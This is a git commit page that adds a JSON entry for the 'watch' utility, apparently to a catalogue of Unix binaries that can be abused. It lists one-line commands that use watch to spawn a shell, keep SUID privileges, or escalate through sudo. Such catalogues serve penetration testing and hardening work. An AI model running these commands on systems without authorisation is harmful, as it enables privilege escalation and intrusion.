add data for watch

master
t0thkr1s 4 years ago
parent defeca370c
commit b0e52b116b

@ -0,0 +1,25 @@
{
"functions": {
"shell": [
{
"code": "watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
}
],
"suid": [
{
"description": "This keeps the SUID privileges only if the '-x' option is present.",
"code": "./watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
}
],
"sudo": [
{
"code": "sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
}
],
"limited-suid": [
{
"code": "./watch 'reset; exec sh 1>&0 2>&0'"
}
]
}
}
Loading…
Cancel
Save